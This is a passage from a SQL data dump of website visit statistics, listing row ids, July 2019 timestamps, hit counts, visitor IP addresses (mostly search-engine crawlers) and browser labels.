,0,'5.45.207.79','other'),(437680,1564107641,1,1,0,0,'95.108.181.54','other'),(437681,1564107738,1,1,0,0,'141.8.188.29','other'),(437682,1564107857,1,1,0,0,'157.55.39.81','other'),(437683,1564108252,1,1,0,0,'66.249.66.220','chrome'),(437684,1564108278,3,3,0,0,'66.249.66.218','chrome'),(437685,1564108610,1,1,0,0,'8.29.198.25','other'),(437686,1564109132,1,1,0,0,'207.46.13.76','other'),(437687,1564109371,1,1,0,0,'40.77.167.44','other'),(437688,1564109408,1,1,0,0,'66.249.66.132','chrome'),(437689,1564109582,3,3,0,0,'141.8.188.29','other'),(437690,1564109700,1,1,0,0,'210.16.189.4','other'),(437691,1564109851,4,4,0,0,'66.249.66.218','chrome'),(437692,1564110352,3,3,0,0,'66.249.66.220','chrome'),(437693,1564110586,1,1,0,0,'8.29.198.25','other'),(437694,1564110645,1,1,0,0,'66.249.66.132','chrome'),(437695,1564110665,2,2,0,0,'66.249.66.130','chrome'),(437696,1564110851,1,1,0,0,'141.8.142.103','other'),(437697,1564112261,2,2,0,0,'31.184.238.108','chrome'),(437698,1564112504,1,1,0,0,'66.249.66.218','chrome'),(437699,1564112552,3,3,0,0,'141.8.188.29','other'),(437700,1564112586,1,1,0,0,'66.249.66.220','chrome'),(437701,1564113029,2,2,0,0,'157.55.39.221','other'),(437702,1564113603,1,1,0,0,'66.249.66.218','chrome'),(437703,1564114289,1,1,0,0,'141.8.188.29','other'),(437704,1564114416,1,1,0,0,'213.180.203.17','other'),(437705,1564114593,1,1,0,0,'66.249.66.222','chrome'),(437706,1564114900,1,1,0,0,'40.77.167.166','other'),(437707,1564114976,37,37,0,0,'173.212.224.157','other'),(437708,1564115616,2,2,0,0,'207.46.13.70','other'),(437709,1564116246,1,1,0,0,'180.76.15.19','other'),(437710,1564116247,1,1,0,0,'5.45.207.19','other'),(437711,1564117223,1,1,0,0,'87.250.224.81','other'),(437712,1564117703,1,1,0,0,'66.249.66.222','chrome'),(437713,1564117781,2,2,0,0,'157.55.39.81','other'),(437714,1564117935,1,1,0,0,'94.180.174.58','msie'),(437715,1564118982,1,1,0,0,'157.55.39.81','other'),(437716,1564119268,1,1,0,0,'95.108.181.75','other'),(437717,1564119457,1,1,0,0,'8.29.198.25','other'),(437718,1564120131,1,1,0,0,'40.77.167.90','other'),(437719,1564120227,1,1,0,0,'77.247.181.165','other'),(437720,1564120246,1,1,0,0,'180.76.15.29','other'),(437721,1564120384,1,1,0,0,'66.249.66.218','chrome'),(437722,1564120594,1,1,0,0,'157.55.39.221','other'),(437723,1564120905,1,1,0,0,'141.8.188.29','other'),(437724,1564121457,1,1,0,0,'8.29.198.26','other'),(437725,1564123020,1,1,0,0,'66.249.66.218','chrome'),(437726,1564123996,1,1,0,0,'66.249.66.128','chrome'),(437727,1564124729,1,1,0,0,'95.108.213.4','other'),(437728,1564124856,1,1,0,0,'141.8.188.29','other'),(437729,1564125046,2,2,0,0,'66.249.66.220','chrome'),(437730,1564125090,1,1,0,0,'141.8.188.65','other'),(437731,1564125594,1,1,0,0,'66.249.66.128','chrome'),(437732,1564125821,2,2,0,0,'157.55.39.221','other'),(437733,1564125825,5,5,0,0,'40.77.167.177','other'),(437734,1564125830,6,6,0,0,'40.77.167.140','other'),(437735,1564125837,1,1,0,0,'40.77.167.62','other'),(437736,1564125983,1,1,0,0,'91.196.178.187','chrome'),(437737,1564126909,1,1,0,0,'141.8.142.103','other'),(437738,1564126939,1,1,0,0,'141.8.188.29','other'),(437739,1564128802,1,1,0,0,'40.77.167.177','other'),(437740,1564129173,2,2,0,0,'141.8.188.11','other'),(437741,1564129225,3,3,0,0,'5.45.207.79','other'),(437742,1564129739,1,1,0,0,'91.196.178.77','chrome'),(437743,1564130294,1,1,0,0,'8.29.198.25','other'),(437744,1564131196,2,2,0,0,'40.77.167.177','other'),(437745,1564131350,1,1,0,0,'40.77.167.140','other'),(437746,1564131433,1,1,0,0,'5.45.207.19','other'),(437747,1564131590,2,2,0,0,'157.55.39.221','other'),(437748,1564132253,1,1,0,0,'40.77.167.140','other'),(437749,1564132306,1,1,0,0,'8.29.198.26','other'),(437750,1564132438,1,1,0,0,'66.249.66.222','chrome'),(437751,1564133015,1,1,0,0,'91.196.178.87','firefox'),(437752,1564133596,1,1,0,0,'37.9.113.20','other'),(437753,1564133819,2,2,0,0,'141.8.142.103','other'),(437754,1564134342,1,1,0,0,'5.45.207.79','other'),(437755,1564134441,1,1,0,0,'91.196.178.169','chrome'),(437756,1564135149,1,1,0,0,'207.46.13.61','other'),(437757,1564135300,1,1,0,0,'141.8.132.16','other'),(437758,1564135381,1,1,0,0,'5.45.207.8','other'),(437759,1564135642,2,2,0,0,'66.249.66.218','chrome'),(437760,1564135719,1,1,0,0,'66.249.66.220','chrome'),(437761,1564135772,1,1,0,0,'40.77.167.28','other'),(437762,1564136405,1,1,0,0,'109.74.154.72','chrome'),(437763,1564137566,1,1,0,0,'91.231.240.249','chrome'),(437764,1564137848,1,1,0,0,'40.77.167.28','other'),(437765,1564137902,2,2,0,0,'207.46.13.61','other'),(437766,1564138877,1,1,0,0,'40.77.167.28','other'),(437767,1564139326,1,1,0,0,'37.9.113.103','other'),(437768,1564139338,1,1,0,0,'141.8.142.103','other'),(437769,1564139352,1,1,0,0,'141.8.132.16','other'),(437770,1564139394,1,1,0,0,'141.8.183.23','other'),(437771,1564139530,1,1,0,0,'207.46.13.61','other'),(437772,1564139953,2,2,0,0,'40.77.167.140','other'),(437773,1564141137,1,1,0,0,'8.29.198.25','other'),(437774,1564141513,2,2,0,0,'37.9.113.103','other'),(437775,1564141529,1,1,0,0,'141.8.188.29','other'),(437776,1564141606,1,1,0,0,'178.154.200.48','other'),(437777,1564141643,1,1,0,0,'87.250.224.65','other'),(437778,1564141886,2,2,0,0,'207.46.13.119','other'),(437779,1564141918,1,1,0,0,'66.249.66.222','chrome'),(437780,1564141944,1,1,0,0,'141.8.142.162','other'),(437781,1564142559,1,1,0,0,'40.77.167.181','other'),(437782,1564143174,1,1,0,0,'8.29.198.26','other'),(437783,1564143248,1,1,0,0,'207.46.13.119','other'),(437784,1564143370,1,1,0,0,'66.249.66.220','chrome'),(437785,1564144839,1,1,0,0,'66.249.66.128','chrome'),(437786,1564145343,1,1,0,0,'141.8.188.65','other'),(437787,1564145749,1,1,0,0,'95.132.37.45','firefox'),(437788,1564146912,1,1,0,0,'13.66.139.0','other'),(437789,1564146942,1,1,0,0,'213.180.203.9','other'),(437790,1564147011,1,1,0,0,'141.8.142.191','other'),(437791,1564147032,2,2,0,0,'40.77.167.17','other'),(437792,1564148101,1,1,0,0,'66.249.66.128','chrome'),(437793,1564148137,1,1,0,0,'195.34.74.63','chrome'),(437794,1564149239,1,1,0,0,'109.122.9.93','chrome'),(437795,1564149373,1,1,0,0,'40.77.167.181','other'),(437796,1564149738,1,1,0,0,'46.211.65.62','chrome'),(437797,1564149751,1,1,0,0,'66.249.66.218','chrome'),(437798,1564149847,1,1,0,0,'66.249.66.220','chrome'),(437799,1564150383,1,1,0,0,'188.255.39.237','msie'),(437800,1564150625,1,1,0,0,'157.55.39.84','other'),(437801,1564151472,1,1,0,0,'40.77.167.126','other'),(437802,1564151618,1,1,0,0,'5.45.207.19','other'),(437803,1564151660,2,2,0,0,'5.45.207.79','other'),(437804,1564151716,1,1,0,0,'141.8.188.11','other'),(437805,1564152005,1,1,0,0,'8.29.198.25','other'),(437806,1564152276,1,1,0,0,'40.77.167.45','other'),(437807,1564152742,1,1,0,0,'178.95.246.137','chrome'),(437808,1564153282,1,1,0,0,'66.249.66.222','chrome'),(437809,1564153366,1,1,0,0,'141.8.142.103','other'),(437810,1564153566,2,2,0,0,'157.55.39.84','other'),(437811,1564153568,1,1,0,0,'40.77.167.13','other'),(437812,1564153821,1,1,0,0,'66.249.66.218','chrome'),(437813,1564154036,1,1,0,0,'66.249.66.220','chrome'),(437814,1564154050,1,1,0,0,'8.29.198.25','other'),(437815,1564154658,2,2,0,0,'141.8.188.11','other'),(437816,1564155297,1,1,0,0,'141.8.188.29','other'),(437817,1564155525,1,1,0,0,'180.76.15.138','other'),(437818,1564155574,2,2,0,0,'157.55.39.84','other'),(437819,1564156144,1,1,0,0,'178.154.200.48','other'),(437820,1564156425,1,1,0,0,'178.154.171.24','other'),(437821,1564156779,1,1,0,0,'40.77.167.13','other'),(437822,1564156781,1,1,0,0,'66.249.66.128','chrome'),(437823,1564156808,1,1,0,0,'66.249.66.220','chrome'),(437824,1564156912,1,1,0,0,'128.124.69.233','chrome'),(437825,1564158007,1,1,0,0,'95.108.181.54','other'),(437826,1564158366,1,1,0,0,'95.108.181.94','other'),(437827,1564158865,1,1,0,0,'40.77.167.45','other'),(437828,1564158890,1,1,0,0,'34.209.219.35','chrome'),(437829,1564158992,1,1,0,0,'5.255.253.25','other'),(437830,1564159310,1,1,0,0,'157.55.39.102','other'),(437831,1564159667,1,1,0,0,'66.249.66.132','chrome'),(437832,1564160003,1,1,0,0,'46.211.41.201','chrome'),(437833,1564160355,1,1,0,0,'178.154.171.24','other'),(437834,1564160358,1,1,0,0,'87.250.224.64','other'),(437835,1564160388,1,1,0,0,'157.55.39.102','other'),(437836,1564160392,1,1,0,0,'141.8.183.22','other'),(437837,1564161300,1,1,0,0,'66.249.66.130','chrome'),(437838,1564161577,1,1,0,0,'95.108.181.54','other'),(437839,1564162094,1,1,0,0,'141.8.188.29','other'),(437840,1564162405,1,0,1,0,'66.249.66.218',''),(437841,1564162796,1,1,0,0,'157.55.39.102','other'),(437842,1564162842,1,1,0,0,'8.29.198.25','other'),(437843,1564162985,2,2,0,0,'95.108.213.4','other'),(437844,1564163966,2,2,0,0,'141.8.188.29','other'),(437845,1564164300,1,1,0,0,'40.77.167.162','other'),(437846,1564164382,1,1,0,0,'157.55.39.102','other'),(437847,1564164734,1,1,0,0,'207.46.13.217','other'),(437848,1564164926,1,1,0,0,'8.29.198.26','other'),(437849,1564165048,1,1,0,0,'141.8.188.29','other'),(437850,1564165540,1,1,0,0,'157.55.39.102','other'),(437851,1564165800,2,2,0,0,'40.77.167.162','other'),(437852,1564165909,1,1,0,0,'5.45.207.79','other'),(437853,1564165968,3,3,0,0,'141.8.188.29','other'),(437854,1564166849,2,2,0,0,'207.46.13.217','other'),(437855,1564167523,1,1,0,0,'5.45.207.19','other'),(437856,1564168512,1,1,0,0,'40.77.167.13','other'),(437857,1564168612,1,1,0,0,'66.249.66.220','chrome'),(437858,1564169352,1,1,0,0,'141.8.142.103','other'),(437859,1564169376,1,1,0,0,'141.8.183.11','other'),(437860,1564169883,2,2,0,0,'40.77.167.162','other'),(437861,1564169938,1,1,0,0,'157.55.39.102','other'),(437862,1564170351,1,1,0,0,'66.249.66.218','chrome'),(437863,1564170435,1,1,0,0,'40.77.167.13','other'),(437864,1564170566,1,1,0,0,'157.55.39.173','other'),(437865,1564171315,1,1,0,0,'207.46.13.243','other'),(437866,1564171332,1,1,0,0,'5.45.207.19','other'),(437867,1564171349,1,1,0,0,'5.45.207.79','other'),(437868,1564171488,1,1,0,0,'40.77.167.162','other'),(437869,1564172132,1,1,0,0,'40.77.167.128','other'),(437870,1564172519,1,1,0,0,'66.249.66.220','chrome'),(437871,1564173496,1,1,0,0,'141.8.188.29','other'),(437872,1564173536,2,2,0,0,'141.8.188.11','other'),(437873,1564173634,2,2,0,0,'207.46.13.243','other'),(437874,1564173676,1,1,0,0,'8.29.198.25','other'),(437875,1564174352,1,1,0,0,'40.77.167.162','other'),(437876,1564174719,1,1,0,0,'157.55.39.206','other'),(437877,1564175064,1,1,0,0,'66.249.66.128','chrome'),(437878,1564175635,1,1,0,0,'141.8.142.103','other'),(437879,1564175677,2,2,0,0,'141.8.188.29','other'),(437880,1564175717,1,1,0,0,'5.45.207.19','other'),(437881,1564175785,1,1,0,0,'8.29.198.26','other'),(437882,1564175988,1,1,0,0,'40.77.167.162','other'),(437883,1564176197,1,1,0,0,'157.55.39.102','other'),(437884,1564177343,1,1,0,0,'40.77.167.162','other'),(437885,1564177366,1,1,0,0,'141.8.188.11','other'),(437886,1564177981,1,1,0,0,'141.8.188.29','other'),(437887,1564179068,1,1,0,0,'40.77.167.78','other'),(437888,1564179233,1,1,0,0,'40.77.167.16','other'),(437889,1564179719,1,1,0,0,'157.55.39.206','other'),(437890,1564179984,1,1,0,0,'40.77.167.5','other'),(437891,1564180181,1,1,0,0,'40.77.167.145','other'),(437892,1564180342,1,1,0,0,'207.46.13.87','other'),(437893,1564181370,1,1,0,0,'66.249.66.220','chrome'),(437894,1564181415,1,1,0,0,'5.45.207.19','other'),(437895,1564181459,2,2,0,0,'141.8.188.11','other'),(437896,1564181511,1,1,0,0,'5.45.207.79','other'),(437897,1564181551,1,1,0,0,'141.8.188.29','other'),(437898,1564183047,1,1,0,0,'209.17.96.234','other'),(437899,1564183256,1,1,0,0,'5.45.207.19','other'),(437900,1564183598,2,2,0,0,'207.46.13.87','other'),(437901,1564183692,1,1,0,0,'40.77.167.16','other'),(437902,1564183723,1,1,0,0,'141.8.188.11','other'),(437903,1564184514,1,1,0,0,'141.8.188.29','other'),(437904,1564184515,1,1,0,0,'8.29.198.27','other'),(437905,1564184858,1,1,0,0,'66.249.66.222','chrome'),(437906,1564184891,2,2,0,0,'40.77.167.16','other'),(437907,1564186011,1,1,0,0,'66.249.66.218','chrome'),(437908,1564186501,1,1,0,0,'141.8.188.11','other'),(437909,1564186632,1,1,0,0,'8.29.198.25','other'),(437910,1564186638,1,1,0,0,'40.77.167.145','other'),(437911,1564187687,1,1,0,0,'95.108.213.4','other'),(437912,1564187700,2,2,0,0,'40.77.167.16','other'),(437913,1564188761,1,1,0,0,'207.46.13.87','other'),(437914,1564189163,1,1,0,0,'141.8.142.38','other'),(437915,1564189174,1,1,0,0,'5.255.253.16','other'),(437916,1564189183,1,1,0,0,'141.8.142.103','other'),(437917,1564190382,1,1,0,0,'66.249.66.220','chrome'),(437918,1564190646,1,1,0,0,'141.8.142.144','other'),(437919,1564190651,1,1,0,0,'141.8.142.191','other'),(437920,1564190654,1,1,0,0,'141.8.188.29','other'),(437921,1564190715,1,1,0,0,'141.8.188.65','other'),(437922,1564191181,1,1,0,0,'66.249.66.128','chrome'),(437923,1564191251,1,1,0,0,'66.249.66.222','chrome'),(437924,1564191952,1,1,0,0,'87.250.224.47','other'),(437925,1564191955,1,1,0,0,'141.8.183.23','other'),(437926,1564192487,1,1,0,0,'157.55.39.200','other'),(437927,1564192892,1,1,0,0,'95.108.181.75','other'),(437928,1564193116,1,1,0,0,'95.108.213.4','other'),(437929,1564193180,1,1,0,0,'66.249.66.132','chrome'),(437930,1564193814,1,1,0,0,'207.46.13.155','other'),(437931,1564195255,1,1,0,0,'95.108.213.50','other'),(437932,1564195363,1,1,0,0,'8.29.198.26','other'),(437933,1564195372,1,1,0,0,'207.46.13.218','other'),(437934,1564195838,2,2,0,0,'87.250.224.47','other'),(437935,1564196328,1,1,0,0,'207.46.13.155','other'),(437936,1564196850,1,1,0,0,'180.76.15.7','other'),(437937,1564197204,1,1,0,0,'213.180.203.61','other'),(437938,1564197404,1,1,0,0,'207.46.13.87','other'),(437939,1564197481,1,1,0,0,'8.29.198.27','other'),(437940,1564198525,1,1,0,0,'207.46.13.155','other'),(437941,1564199507,1,1,0,0,'87.250.224.65','other'),(437942,1564199623,1,1,0,0,'207.46.13.155','other'),(437943,1564201205,1,1,0,0,'141.8.183.22','other'),(437944,1564201276,1,1,0,0,'94.180.151.94','chrome'),(437945,1564202247,1,1,0,0,'207.46.13.155','other'),(437946,1564202376,1,1,0,0,'207.46.13.229','other'),(437947,1564204121,1,1,0,0,'207.46.13.229','other'),(437948,1564205509,1,1,0,0,'141.8.142.144','other'),(437949,1564206194,1,1,0,0,'8.29.198.25','other'),(437950,1564206791,1,1,0,0,'89.234.157.254','other'),(437951,1564207181,2,2,0,0,'207.46.13.127','other'),(437952,1564208036,1,1,0,0,'207.46.13.151','other'),(437953,1564208324,1,1,0,0,'8.29.198.26','other'),(437954,1564209302,1,1,0,0,'5.255.253.16','other'),(437955,1564209343,1,1,0,0,'178.154.171.17','other'),(437956,1564210008,1,1,0,0,'66.249.66.218','chrome'),(437957,1564210544,1,1,0,0,'207.46.13.151','other'),(437958,1564210546,1,1,0,0,'5.45.207.19','other'),(437959,1564210554,1,1,0,0,'87.250.224.65','other'),(437960,1564210592,1,1,0,0,'207.46.13.127','other'),(437961,1564211066,1,1,0,0,'141.8.183.23','other'),(437962,1564211107,1,1,0,0,'213.180.203.61','other'),(437963,1564211150,1,1,0,0,'5.45.207.8','other'),(437964,1564211706,1,1,0,0,'207.46.13.229','other'),(437965,1564212570,1,1,0,0,'5.255.253.38','other'),(437966,1564212645,1,1,0,0,'213.180.203.61','other'),(437967,1564212647,1,1,0,0,'141.8.142.81','other'),(437968,1564212874,1,1,0,0,'141.8.183.23','other'),(437969,1564213677,1,1,0,0,'40.77.167.20','other'),(437970,1564214275,1,1,0,0,'141.8.183.23','other'),(437971,1564214788,1,1,0,0,'207.46.13.151','other'),(437972,1564215485,1,1,0,0,'66.249.66.220','chrome'),(437973,1564215868,1,1,0,0,'93.158.166.7','other'),(437974,1564216066,1,1,0,0,'5.255.253.25','other'),(437975,1564216134,1,1,0,0,'141.8.188.65','other'),(437976,1564217023,1,1,0,0,'8.29.198.27','other'),(437977,1564217120,1,1,0,0,'5.45.207.19','other'),(437978,1564217142,1,1,0,0,'5.45.207.79','other'),(437979,1564217235,1,1,0,0,'207.46.13.127','other'),(437980,1564217806,1,1,0,0,'207.46.13.229','other'),(437981,1564217985,1,1,0,0,'178.154.171.17','other'),(437982,1564218349,1,1,0,0,'66.249.66.222','chrome'),(437983,1564218849,1,1,0,0,'213.180.203.40','other'),(437984,1564219128,1,1,0,0,'180.76.15.28','other'),(437985,1564219185,1,1,0,0,'8.29.198.26','other'),(437986,1564220114,1,1,0,0,'60.191.38.77','firefox'),(437987,1564220643,2,2,0,0,'207.46.13.151','other'),(437988,1564221268,1,1,0,0,'66.249.66.222','chrome'),(437989,1564221299,1,1,0,0,'40.77.167.20','other'),(437990,1564221738,1,1,0,0,'109.74.154.72','chrome'),(437991,1564221874,1,1,0,0,'141.8.183.22','other'),(437992,1564221896,1,1,0,0,'37.9.113.148','other'),(437993,1564221916,1,1,0,0,'141.8.183.11','other'),(437994,1564222481,1,1,0,0,'207.46.13.229','other'),(437995,1564222549,3,3,0,0,'207.46.13.151','other'),(437996,1564222790,1,1,0,0,'207.46.13.127','other'),(437997,1564223014,1,1,0,0,'66.249.66.222','chrome'),(437998,1564223491,1,1,0,0,'5.45.207.19','other'),(437999,1564223914,1,1,0,0,'141.8.142.191','other'),(438000,1564224839,1,1,0,0,'51.68.152.26','chrome'),(438001,1564224918,1,1,0,0,'95.108.181.54','other'),(438002,1564226486,1,1,0,0,'141.8.188.29','other'),(438003,1564227249,1,1,0,0,'207.46.13.151','other'),(438004,1564227808,1,1,0,0,'141.8.183.11','other'),(438005,1564227850,1,1,0,0,'178.154.171.30','other'),(438006,1564227851,1,1,0,0,'8.29.198.25','other'),(438007,1564227894,1,1,0,0,'178.154.171.17','other'),(438008,1564227928,1,1,0,0,'5.45.207.8','other'),(438009,1564228026,1,1,0,0,'178.154.171.69','other'),(438010,1564229056,1,1,0,0,'141.8.142.144','other'),(438011,1564229110,1,1,0,0,'141.8.188.65','other'),(438012,1564229118,1,1,0,0,'213.180.203.40','other'),(438013,1564229121,1,1,0,0,'213.180.203.9','other'),(438014,1564229300,1,1,0,0,'5.255.253.25','other'),(438015,1564230047,1,1,0,0,'8.29.198.25','other'),(438016,1564230066,1,1,0,0,'157.55.39.242','other'),(438017,1564230076,1,1,0,0,'207.46.13.180','other'),(438018,1564230235,1,1,0,0,'5.45.207.79','other'),(438019,1564231608,1,1,0,0,'60.191.38.77','firefox'),(438020,1564231688,1,1,0,0,'66.249.66.130','chrome'),(438021,1564233575,1,1,0,0,'66.249.66.218','chrome'),(438022,1564233867,1,1,0,0,'95.108.213.4','other'),(438023,1564234939,1,1,0,0,'87.250.224.64','other'),(438024,1564234984,1,1,0,0,'178.154.171.69','other'),(438025,1564235048,1,1,0,0,'178.154.171.17','other'),(438026,1564235880,1,1,0,0,'157.55.39.242','other'),(438027,1564235924,1,1,0,0,'207.46.13.127','other'),(438028,1564235949,1,1,0,0,'66.249.66.220','chrome'),(438029,1564236146,1,1,0,0,'87.250.224.47','other'),(438030,1564236176,1,1,0,0,'95.108.181.54','other'),(438031,1564236802,1,1,0,0,'207.46.13.151','other'),(438032,1564237471,1,1,0,0,'180.76.15.32','other'),(438033,1564237527,1,1,0,0,'141.8.142.103','other'),(438034,1564237606,1,1,0,0,'141.8.188.29','other'),(438035,1564237608,1,1,0,0,'141.8.142.108','other'),(438036,1564237611,1,1,0,0,'141.8.183.22','other'),(438037,1564237637,1,1,0,0,'5.45.207.8','other'),(438038,1564238694,1,1,0,0,'8.29.198.26','other'),(438039,1564238896,1,1,0,0,'178.154.171.17','other'),(438040,1564238943,1,1,0,0,'5.45.207.19','other'),(438041,1564240174,1,1,0,0,'87.250.224.47','other'),(438042,1564240198,2,2,0,0,'95.108.181.54','other'),(438043,1564240376,1,1,0,0,'157.55.39.242','other'),(438044,1564240452,1,1,0,0,'178.154.171.30','other'),(438045,1564240518,1,1,0,0,'5.45.207.8','other'),(438046,1564240920,1,1,0,0,'8.29.198.26','other'),(438047,1564241611,1,1,0,0,'40.77.167.147','other'),(438048,1564242241,1,1,0,0,'207.46.13.12','other'),(438049,1564242775,1,1,0,0,'95.108.181.75','other'),(438050,1564243362,1,1,0,0,'40.77.167.147','other'),(438051,1564243396,1,1,0,0,'94.180.151.94','chrome'),(438052,1564243495,1,1,0,0,'66.249.66.128','chrome'),(438053,1564243736,1,1,0,0,'141.8.188.65','other'),(438054,1564244066,1,1,0,0,'207.46.13.130','other'),(438055,1564244096,1,1,0,0,'66.249.66.222','chrome'),(438056,1564244462,1,1,0,0,'91.242.162.135','other'),(438057,1564245295,1,1,0,0,'5.255.253.38','other'),(438058,1564245319,1,1,0,0,'37.9.113.38','other'),(438059,1564245349,1,1,0,0,'207.46.13.130','other'),(438060,1564245467,1,1,0,0,'157.55.39.242','other'),(438061,1564246313,1,1,0,0,'207.46.13.130','other'),(438062,1564246696,1,1,0,0,'178.154.200.8','other'),(438063,1564248201,1,1,0,0,'157.55.39.242','other'),(438064,1564248202,1,1,0,0,'141.8.142.191','other'),(438065,1564248401,1,1,0,0,'207.46.13.130','other'),(438066,1564248815,1,1,0,0,'66.249.66.128','chrome'),(438067,1564249378,1,1,0,0,'178.154.171.69','other'),(438068,1564249417,2,2,0,0,'93.158.166.7','other'),(438069,1564249421,1,1,0,0,'141.8.142.103','other'),(438070,1564249435,1,1,0,0,'5.45.207.19','other'),(438071,1564249543,1,1,0,0,'8.29.198.25','other'),(438072,1564249606,1,1,0,0,'157.55.39.242','other'),(438073,1564251031,1,1,0,0,'207.46.13.130','other'),(438074,1564251301,1,1,0,0,'52.162.161.148','other'),(438075,1564251406,1,1,0,0,'5.255.253.22','other'),(438076,1564251660,1,1,0,0,'66.249.66.218','chrome'),(438077,1564251717,1,1,0,0,'157.55.39.242','other'),(438078,1564251772,1,1,0,0,'207.46.13.233','other'),(438079,1564251776,1,1,0,0,'8.29.198.27','other'),(438080,1564251838,1,1,0,0,'93.158.166.7','other'),(438081,1564251972,2,2,0,0,'207.46.13.130','other'),(438082,1564252049,1,1,0,0,'157.55.39.54','other'),(438083,1564252753,1,1,0,0,'141.8.132.16','other'),(438084,1564253138,1,1,0,0,'5.255.253.25','other'),(438085,1564253161,1,1,0,0,'87.250.224.99','other'),(438086,1564253183,1,1,0,0,'37.9.113.148','other'),(438087,1564253759,1,1,0,0,'141.8.132.16','other'),(438088,1564253797,1,1,0,0,'213.180.203.48','other'),(438089,1564253799,1,1,0,0,'37.9.113.20','other'),(438090,1564254545,1,1,0,0,'157.55.39.242','other'),(438091,1564255208,1,1,0,0,'95.108.213.50','other'),(438092,1564255351,1,1,0,0,'5.45.207.19','other'),(438093,1564255734,1,1,0,0,'66.249.66.218','chrome'),(438094,1564255814,1,1,0,0,'91.196.178.97','chrome'),(438095,1564255927,1,1,0,0,'141.8.142.81','other'),(438096,1564256171,1,1,0,0,'207.46.13.233','other'),(438097,1564257068,1,1,0,0,'207.46.13.107','other'),(438098,1564257699,1,1,0,0,'157.55.39.242','other'),(438099,1564258245,2,2,0,0,'178.154.171.30','other'),(438100,1564258305,1,1,0,0,'207.46.13.130','other'),(438101,1564258345,1,1,0,0,'141.8.132.16','other'),(438102,1564258452,1,1,0,0,'141.8.142.191','other'),(438103,1564258466,1,1,0,0,'95.108.181.54','other'),(438104,1564258690,1,1,0,0,'141.8.142.103','other'),(438105,1564259582,2,2,0,0,'207.46.13.107','other'),(438106,1564259605,1,1,0,0,'5.45.207.8','other'),(438107,1564259615,1,1,0,0,'178.154.171.30','other'),(438108,1564259621,2,2,0,0,'157.55.39.242','other'),(438109,1564259921,1,1,0,0,'5.255.253.38','other'),(438110,1564259925,1,1,0,0,'87.250.224.107','other'),(438111,1564260193,1,1,0,0,'66.249.66.218','chrome'),(438112,1564260386,1,1,0,0,'37.9.113.38','other'),(438113,1564260387,1,1,0,0,'8.29.198.27','other'),(438114,1564260589,1,1,0,0,'37.9.113.148','other'),(438115,1564260680,1,1,0,0,'93.158.166.7','other'),(438116,1564260682,1,1,0,0,'141.8.188.65','other'),(438117,1564261237,1,1,0,0,'207.46.13.107','other'),(438118,1564261241,1,1,0,0,'207.46.13.130','other'),(438119,1564262626,1,1,0,0,'8.29.198.26','other'),(438120,1564262780,1,1,0,0,'66.249.66.222','chrome'),(438121,1564262877,1,1,0,0,'207.46.13.107','other'),(438122,1564263297,1,1,0,0,'141.8.142.191','other'),(438123,1564263362,1,1,0,0,'87.250.224.64','other'),(438124,1564263420,1,1,0,0,'213.180.203.23','other'),(438125,1564263674,1,1,0,0,'157.55.39.175','other'),(438126,1564263875,1,1,0,0,'87.250.224.99','other'),(438127,1564264558,1,1,0,0,'157.55.39.242','other'),(438128,1564265992,1,1,0,0,'66.249.66.222','chrome'),(438129,1564266319,1,1,0,0,'207.46.13.107','other'),(438130,1564266418,1,1,0,0,'157.55.39.175','other'),(438131,1564266850,1,1,0,0,'157.55.39.116','other'),(438132,1564268462,1,1,0,0,'91.196.178.102','chrome'),(438133,1564268610,1,1,0,0,'87.250.224.64','other'),(438134,1564268667,1,1,0,0,'157.55.39.175','other'),(438135,1564269093,1,1,0,0,'157.55.39.242','other'),(438136,1564270885,1,1,0,0,'37.9.113.148','other'),(438137,1564271239,1,1,0,0,'8.29.198.27','other'),(438138,1564272466,1,1,0,0,'5.255.253.38','other'),(438139,1564272515,1,1,0,0,'213.180.203.40','other'),(438140,1564273490,1,1,0,0,'8.29.198.25','other'),(438141,1564274622,1,1,0,0,'66.249.66.222','chrome'),(438142,1564274655,1,1,0,0,'178.154.171.69','other'),(438143,1564274696,1,1,0,0,'207.46.13.107','other'),(438144,1564274809,1,1,0,0,'66.249.66.132','chrome'),(438145,1564275539,1,1,0,0,'95.108.181.54','other'),(438146,1564275614,1,1,0,0,'93.158.166.7','other'),(438147,1564276194,1,1,0,0,'87.250.224.99','other'),(438148,1564276312,1,1,0,0,'66.249.66.132','chrome'),(438149,1564277653,1,1,0,0,'180.76.15.29','other'),(438150,1564278660,1,1,0,0,'157.55.39.242','other'),(438151,1564278886,1,1,0,0,'37.9.113.38','other'),(438152,1564280381,1,1,0,0,'95.108.181.54','other'),(438153,1564281380,1,1,0,0,'157.55.39.167','other'),(438154,1564282086,1,1,0,0,'8.29.198.26','other'),(438155,1564283086,1,1,0,0,'157.55.39.167','other'),(438156,1564283613,1,1,0,0,'180.76.15.155','other'),(438157,1564283894,1,1,0,0,'66.249.66.132','chrome'),(438158,1564284337,1,1,0,0,'8.29.198.26','other'),(438159,1564284583,1,1,0,0,'178.154.171.30','other'),(438160,1564284646,1,1,0,0,'5.45.207.19','other'),(438161,1564284649,1,1,0,0,'87.250.224.65','other'),(438162,1564285152,1,1,0,0,'157.55.39.167','other'),(438163,1564285876,1,1,0,0,'157.55.39.155','other'),(438164,1564286990,1,1,0,0,'91.209.11.236','other'),(438165,1564287292,1,1,0,0,'37.9.113.38','other'),(438166,1564287304,1,1,0,0,'5.45.207.76','other'),(438167,1564287307,1,1,0,0,'66.249.66.220','chrome'),(438168,1564289618,1,1,0,0,'178.154.200.8','other'),(438169,1564291086,1,1,0,0,'95.108.181.83','other'),(438170,1564292238,1,1,0,0,'157.55.39.167','other'),(438171,1564292926,1,1,0,0,'8.29.198.27','other'),(438172,1564293035,1,1,0,0,'77.247.181.162','other'),(438173,1564293241,1,1,0,0,'66.249.66.220','chrome'),(438174,1564294019,2,2,0,0,'157.55.39.173','other'),(438175,1564294083,1,1,0,0,'157.55.39.155','other'),(438176,1564294554,1,1,0,0,'87.250.224.65','other'),(438177,1564294557,1,1,0,0,'87.250.224.64','other'),(438178,1564295176,1,1,0,0,'8.29.198.26','other'),(438179,1564295606,1,1,0,0,'66.249.66.220','chrome'),(438180,1564295759,1,1,0,0,'66.249.66.218','chrome'),(438181,1564296165,1,1,0,0,'180.76.15.5','other'),(438182,1564296187,1,1,0,0,'95.108.181.94','other'),(438183,1564296251,1,1,0,0,'207.46.13.21','other'),(438184,1564296733,1,1,0,0,'157.55.39.173','other'),(438185,1564297319,2,2,0,0,'157.55.39.155','other'),(438186,1564297923,1,1,0,0,'178.154.171.17','other'),(438187,1564297982,1,1,0,0,'66.249.66.218','chrome'),(438188,1564298374,1,1,0,0,'157.55.39.173','other'),(438189,1564298378,2,2,0,0,'207.46.13.218','other'),(438190,1564298383,2